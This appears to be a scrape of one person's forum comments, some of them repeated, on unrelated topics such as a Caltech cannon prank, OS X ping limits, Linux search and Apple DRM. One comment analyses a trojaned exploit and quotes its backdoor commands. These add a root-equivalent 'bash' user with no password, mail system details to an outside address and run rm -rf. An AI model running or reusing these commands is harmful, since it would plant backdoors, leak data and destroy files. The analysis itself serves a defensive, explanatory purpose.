Subject: Caltech cannon
Date: 28 March 06 19:56:34 PST
To: [HMC internal mailing list]
Howdy,
Did anyone steal the Caltech cannon Monday night/Tuesday
morning? They called and said it was stolen and were hoping it was here.
Chris Sundberg
Associate Dean of Students
Harvey Mudd College
(reposting this logged in to get it above default viewing threshold - damned moderation system...)
If you watch the system log on an OS X machine that's getting ping flooded, you'll note that it starts printing "Limiting icmp ping response from (large number) to 250 packets per second". It's entirely intentional.
The exploit, as distributed, has been modified to effectively hang the machine unless you're at the console. Look at the kill(0, SIGTERM) and you'll understand...
And how long does it take you to grep through all your files?
What grep doesn't have is indexing, and locate only searches through filenames.
Wake me when you have a content/metadata index under Linux.
Most businesses I've seen use networked HP Laserjet printers for their laser printing. These printers are just about as standard (and Linux-compatible) as you can get. No drivers (other than a network card driver which you should already have) necessary.
Yes, and the iTMS DRM (Fairplay) is some of the weakest DRM on the market, save DVDCSS. There's software out there - Hymn - that can convert a m4p (iTMS-protected AAC) to m4a (unprotected AAC) given the key, which can be extracted from an iPod or generated on a Windows machine. That, and you can burn music to a CD and rip it from there.
Compared to a lot of the other DRM on the market, Apple's is little more than a nod in the direction of the RIAA.
Oh, wonderful, I screwed that up too. Feel free to moderate this mistake out of existence.
Subject: Caltech cannon Date: 28 March 06 19:56:34 PST To: [HMC internal mailing list] Howdy, Did anyone steal the Caltech cannon Monday night/Tuesday morning? They called and said it was stolen and were hoping it was here. Chris Sundberg Associate Dean of Students Harvey Mudd College (reposting this logged in to get it above default viewing threshold - damned moderation system...)
No, but your computer is. (SInfo identifies the version of nmap being used and the computer that's running it.)
If you watch the system log on an OS X machine that's getting ping flooded, you'll note that it starts printing "Limiting icmp ping response from (large number) to 250 packets per second". It's entirely intentional.
It is repairable. I've done so myself - it's a tricky bit of soldering, but by no means impossible.
THE MERGING IS COMPLETE.
Oh, ok. Thought you meant the title screen music.
Where did you get the name "morituri te salutant"? I can't seem to find a reference to it anywhere.
InnoDB *is* MySQL.
Yay.
The exploit, as distributed, has been modified to effectively hang the machine unless you're at the console. Look at the kill(0, SIGTERM) and you'll understand...
Segfaulted in sys_mmap2 when I tried it on a couple machines. For what it's worth.
... They're everywhere!
Locate searches filenames, not content.
Ooooh! Cool... I'll have to try that sometime.
And how long does it take you to grep through all your files? What grep doesn't have is indexing, and locate only searches through filenames. Wake me when you have a content/metadata index under Linux.
ground battles set in dessert... well, hmm. It's kind of like mud wrestling, but with pudding instead of mud.
... the First Post, I suppose?
For what it's worth, the Chinese government treats Falun Dafa / Falun Gong the same way you'd expect to treat a militant group.
Lilypond + denemo = notation happiness. (Lilypond is like LaTeX for music.)
Easiest fix: turn on Lite Mode. Makes most of the annoying themes go away, too.
inst.c is the core of the program; fileutils-patch.bin is chaff - it isn't used.
What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:
/tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null /tmp/mama
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
In other words, it'll create a root-equivalent user called 'bash' and mailing some system info to root@addlebrain.com.
Most businesses I've seen use networked HP Laserjet printers for their laser printing. These printers are just about as standard (and Linux-compatible) as you can get. No drivers (other than a network card driver which you should already have) necessary.
Compared to a lot of the other DRM on the market, Apple's is little more than a nod in the direction of the RIAA.